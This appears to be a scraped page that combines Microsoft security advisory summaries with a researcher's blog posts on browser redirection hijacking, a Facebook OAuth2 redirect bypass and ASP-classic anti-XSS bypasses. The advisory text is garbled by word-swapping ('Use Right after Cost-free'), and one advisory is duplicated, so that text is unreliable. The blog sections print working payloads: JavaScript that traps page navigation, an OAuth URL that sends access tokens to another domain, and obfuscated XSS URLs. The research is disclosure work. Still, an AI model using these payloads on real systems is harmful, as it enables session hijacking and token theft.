Microsoft Safety Advisory (2819682): Security Updates for Microsoft Windows Shop Applications – Version: 1.0

Revision Note: V1. (March 26, 2013): Announced availability of update 2832006 for Windows Modern day Mail.
Summary: Microsoft is announcing the availability of security updates for Windows Store applications running on Windows eight, Windows RT, and Windows Server 2012 (Windows Server 2012 Server Core installations are not affected). The updates address vulnerabilities that are detailed in the Understanding Base articles related with each update.

Microsoft Security Advisory (2819682): Safety Updates for Microsoft Windows Retailer Applications – Version: 1.0

Revision Note: V1. (March 26, 2013): Announced availability of update 2832006 for Windows Modern day Mail.
Summary: Microsoft is announcing the availability of security updates for Windows Shop applications running on Windows eight, Windows RT, and Windows Server 2012 (Windows Server 2012 Server Core installations are not impacted). The updates address vulnerabilities that are detailed in the Expertise Base articles connected with each update.

IE/Firefox Redirection Issue – FB Oauth2 Bypass – BugCrowd

To keep a record of the little things I have done since my last blog post:

1- IE/Firefox – Page Redirection Hijack

Several weeks ago, I reported an interesting PoC via my Twitter in which I had created a web page that stops Firefox and IE browsers to redirect users to their intended destination even if they had typed it directly in the address bar: https://twitter.com/irsdl/status/294239415428067329

This issue is still unpatched in the latest versions of these browsers (March 2013). Unfortunately, some advert companies are currently exploiting this issue as well. I have already reported it to Mozilla: https://bugzilla.mozilla.org/show_bug.cgi?id=839470

Example 1: No Redirection Ever: http://0me.me/demo/mozilla/firefox/UnRedirectablePage.html

Here is the Javascript code that does this:

window.onbeforeunload = function(){

      //Unredirectable Page

      setTimeout("window.location=document.location;alert('delay by alert');",0);

}

Example 2: This always redirects you to secproject.com:   http://0me.me/demo/mozilla/firefox/RedirectToSecProject.html

Here is the Javascript code that does this:

window.onbeforeunload = function(){

//Unredirectable Page

setTimeout("window.location='http://www.secproject.com';alert('delay by alert');",0);

}

2- Facebook OAuth2 Bypass

Facebook OAuth2 yet another redirection bypass! I only found one issue which was very similar to what Nir Goldshlager (www.nirgoldshlager.com) and Egor Homakov (homakov.blogspot.co.uk) had reported to Facebook. I highly recommend their blog posts about Facebook Oauth2 for reading and learning!

Here is what I have found in Facebook:

The following URL could send your sessions to attacker’s domain and he could hijack your OAuth token: Link


https://www.facebook.com/dialog/oauth?client_id=210831918949520&response_type=token&scope=,,,,&redirect_uri=https://apps.facebook.com/candycrush1//////////%23/testrdirsdl/%2523

It used to work in all the browsers. However, you needed to find an authorised Facebook app in order to be able to exploit this issue.

A short description:

- “/////” in the URL -> to bypass IE problem with Facebook redirection

- “candycrush1” -> to redirect the user to a normal user page instead of candycrush game! “https://apps.facebook.com/candy.crush1” takes you to a user page instead of an App!

- “%2523” and “%23” -> to remove # in the final URL and send the token directly in the URL.

The result of loading that URL was:

http://apps.facebook.com/testrdirsdl/&access_token=BlahBlahBlah&expires_in=5033

in which “testrdirsdl” is my app that can store the tokens in “http://www.secproject.com/demo/showmyinfo.php” (it does not have logging functionality at the moment!)

3- BugCrowd!

I attended several BugCrowd.com bounties and gladly received $ $ $ for private and public bounties! I liked the charity ones as well icon smile IE/Firefox Redirection Issue – FB Oauth2 Bypass – BugCrowd

If you want to test live and different websites without having legal obligations (well, I hope they can provide us with a signed document per project very soon!), it is the right place. I recommend it to the people who want to have fun and increase their web app. security testing skills.

Unfortunately, the recent bounties from BugCrowd did not have fair prizes and I guess it is because of the companies budgets. Moreover, we still need them to come up with the hall of fame table! As soon as they sort these out, I will become more interested!

That’s it for now. Thanks for your time.

Browsers Anti-XSS approaches in ASP (classic) have been defeated!

Download Link: http://soroush.secproject.com/downloadable/Browsers_Anti-XSS_methods_in_ASP_(classic)_have_been_defeated.pdf

Browsers Anti-XSS methods in ASP (classic) have been defeated!

This time, I want to start with the summary section first to break the rules!

Summary

The intention of this paper is to prove the client-side XSS protection methods must have rules for different web application languages, otherwise they will be bypassed. This research is based on ASP classic web applications, but it can be performed in other web application languages as well.

Introduction

I researched different methods of sending inputs to an ASP (classic) page. I found out that almost all of the browsers’ Anti-XSS protection methods are not aware of different features of ASP that accept the inputs; therefore, all of them can be bypassed.

Note: NoScript has already added all of these rules to its application and it is more secure than the others currently (thanks to Giorgio Maone for patching the application as quickly as possible). IE9 has better sense about ASP than Google Chrome, but it does not still have all the rules.

Description

In order to make you more interested, I will start with two examples:

Example 1: Do you think Anti-XSS methods should detect this easy XSS attack?


http://www.sdl.me/xssdemo/getxss.asp?input1=<script/&&input1=FOOBAR&input1=>alert('@IRSDL');</script>

Please try it in IE8/9/10 and Google Chrome to see the result.

Example 2: What about this?


http://www.sdl.me/xssdemo/getxss.asp?input1=<script/&in%u2119ut1=>al%u0117rt('@IRSDL')</script/

Example 3: Or, sometimes, the bypass can be complicated! This is how I solved my XSS1 and XSS2 questions with a single solution in SecProject.com Challenge Series 1:


http://sdl.me/challenge1/xss1/JsChallenge1.asp?I%%NPUT2=Somet%%hing&iN%%PUT2=')1&inP%%UT2%00%00=1};lt=1;1&In%u2119ut2=1%26<1&input2=0<ale%%rt(/AWESOME_IRSDL/&in%u2119U%%T2%00%00%0%%0%00%0%%0=1);1&in%u2119uT%%2%00=1;i%%f(0&in%u2119ut2%%=1){{1&I%%n%%PuT2%00%00%00=1/%%*%%/&iN%%p%%Ut2=1/%%/

And

http://sdl.me/challenge1/xss2/JsChallenge2.asp?I%%NPUT1=Somet%%hing&iN%%PUT1=')1&inP%%UT1%00%00=1};lt=1;1&In%u2119ut1=1%26<1&input1=0<ale%%rt(/AWESOME_IRSDL/&in%u2119U%%T1%00%00%0%%0%00%0%%0=1);1&in%u2119uT%%1%00=1;i%%f(0&in%u2119ut1%%=1){{1&I%%n%%PuT1%00%00%00=1/%%*%%/&iN%%p%%Ut1=1/%%/

As you see, I am only using 1 input parameter to bypass everything! (Note: this special page in xss1 converts “<” and “>” to “&lt;” and “&gt;” which was used to bypass NoScript as well – it is not a NoScript bug)

Why can you bypass XSS protections? I will tell you now.

Interesting ASP Input Features

1- HTTP Parameter Pollution (HPP): ASP is one of the web application languages which can receive several inputs with one single name. Although this feature was/is used legitimately in some of the web applications, it can be useful for attackers to bypass some restrictions as well [1].

2- Certain UTF-8 characters will be transformed to their ASCII equivalents [2], [3]. It can be used in both of parameter names and their values. Therefore, “inPut1=<scriPt/>” is equal to “%u0131n%u2119ut1=%u3008scr%u0131%u2119t>”

3- Parameter names in ASP are not case sensitive. Therefore, “input1” is equal to “InPuT1”.

4- Anything after the Null character will be ignored in parameter names and their values. Therefore, “input1=test” is equal to “input1%00Something=test%00Anything”

5- Percentage characters (“%”) will be ignored when there is no Hex value after them in parameter names and their values. Therefore, “input1=test” is equal to “%input1%=t%%est%”

6- When a parameter name after the ampersand character (“&”) is not followed by an equal sign (“=”), ASP does not count it as a separate input. As a result, in “?&input1=test” the parameter name is “&input1”; or, in “?&input1&input1=test” the parameter name is “&input1&input1”.

Bypassing browsers Anti-XSS protections

Now we know many different interesting features of ASP. We can mix these features together to bypass the browsers protections which do not understand these rules. Please see the above examples again to identify the feature types which have been used.

Note 1: URL Encoding can be used in ASP to obfuscate the attack.

Note 2: Many UTF-8 vectors such as “%u1111” will be translated to “?” in ASP which can be used in JavaScript.

Note 3: Normally, a UTF-8 encoded string should have a lowercase “u”. Therefore, “%u0041” (which is “A”) is not equal to “%U0041” (which is “U0041”). However, sometimes server configurations can make these equal!

Note 4: If you have more than 1 input (multi-injection), reordering the input parameters may bypass the protections (input disorder method [4]).

Finally

Please let me know via twitter or email if you know or have found any other interesting features.

This research was based on ASP classic language. However, other languages such as PHP can be studied in the same way; for example, PHP ignores spaces before the parameter names and anything after the “[]” or a null character (“%00”) in the parameter names, or in PHP, space, dot, and a lone square-bracket characters (“ .[”) in parameter names will be converted to an underscore character (“_”).

References

[1] HTTP Parameter Pollution, URL: https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf

[2] NoScript New Bypass Method by Unicode in ASP, URL: http://soroush.secproject.com/blog/2010/08/noscript-new-bypass-method-by-unicode-in-asp/

[3] Lost in Translation (ASP’s HomoXSSuality), URL: http://hackademix.net/2010/08/17/lost-in-translation-asps-homoxssuality/

[4] SecProject Web AppSec Challenge Series 1 Results, URL: http://soroush.secproject.com/blog/2012/06/challenge-series-1-result-and-conclusion/

 

Download Link: http://soroush.secproject.com/downloadable/Browsers_Anti-XSS_methods_in_ASP_(classic)_have_been_defeated.pdf

Microsoft Security Advisory (973811): Extended Protection for Authentication – Version: 1.14

Revision Note: V1.14 (January 8, 2013): Updated the FAQ and Suggested Actions with details about attacks against NTLMv1 (NT LAN Manager version 1) and LAN Manager (LM) network authentication. Microsoft Fix it options for Windows XP and Windows Server 2003 are obtainable to aid defend against these attacks. Applying these Microsoft Repair it options enables NTLMv2 settings needed for users to take benefit of Extended Protection for Authentication.
Summary: Microsoft is announcing the availability of a new function, Extended Protection for Authentication, on the Windows platform. This feature enhances the protection and handling of credentials when authenticating network connections making use of Integrated Windows Authentication (IWA).

Microsoft Security Advisory (2794220): Vulnerability in Internet Explorer Could Permit Remote Code Execution – Version: two.0

Revision Note: V2. (January 14, 2013): Advisory updated to reflect publication of safety bulletin.
Summary: Microsoft has completed the investigation into a public report of this vulnerability. We have issued MS13-008 to address this problem. For much more info about this concern, including download links for an accessible safety update, please assessment MS13-008. The vulnerability addressed is the Net Explorer Use Right after Cost-free Vulnerability – CVE-2012-4792.

Microsoft Security Advisory (2798897): Fraudulent Digital Certificates Could Let Spoofing – Version: 1.1

Revision Note: V1.1 (January 14, 2013): Corrected the disallowed certificate list efficient date to “Monday, December 31, 2012 (or later)” in the FAQ entry, “Right after applying the update, how can I confirm the certificates in the Microsoft Untrusted Certificates Store?”
Summary: Microsoft is conscious of active attacks utilizing a single fraudulent digital certificate issued by TURKTRUST Inc., which is a CA present in the Trusted Root Certification Authorities Shop. This fraudulent certificate could be employed to spoof content, execute phishing attacks, or perform man-in-the-middle attacks. This issue impacts all supported releases of Microsoft Windows.

Microsoft IIS tilde character “~” Vulnerability/Function – Quick File/Folder Name Disclosure

Click here to download the paper.

Two security issues have been reported via this security research:

1- IIS Short File/Folder Name Disclosure by using tilde “~” character:

        Click here for the advisory

2- .Net Framework Tilde Character DoS:

        Click here for the advisory

Workaround and Prevention:

We are working with security vendors to come up with a solution to mitigate the risk of these vulnerabilities. The paper PDF file will be updated accordingly.

IIS Shortname Scanner PoC – Source Code: http://code.google.com/p/iis-shortname-scanner-poc/

PoC Video:

Click here to download the paper.
Download Link:


http://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf

Microsoft Safety Advisory (2757760): Vulnerability in Internet Explorer Could Enable Remote Code Execution – Version: two.0

Revision Note: V2. (September 21, 2012): Advisory updated to reflect publication of security bulletin.
Summary: Microsoft has completed the investigation into public reports of this vulnerability. We have issued MS12-063 to address this situation. For far more details about this situation, such as download links for an accessible security update, please review MS12-063. The vulnerability addressed is the execCommand Use Immediately after Free of charge Vulnerability – CVE-2012-4969.

Microsoft Security Advisory (2737111): Vulnerabilities in Microsoft Exchange and Quick Search Server 2010 for SharePoint Parsing Could Permit Remote Code Execution – Version: three.0

Revision Note: V3. (October 9, 2012): Advisory updated to reflect publication of safety bulletin for Microsoft Rapidly Search Server 2010 for SharePoint.
Summary: Microsoft has completed the investigation into public reports of vulnerabilities in third-celebration code, Oracle Outdoors In libraries, that affect Microsoft Exchange Server 2007, Microsoft Exchange Server 2010, and Fast Search Server 2010 for SharePoint, which ship that component.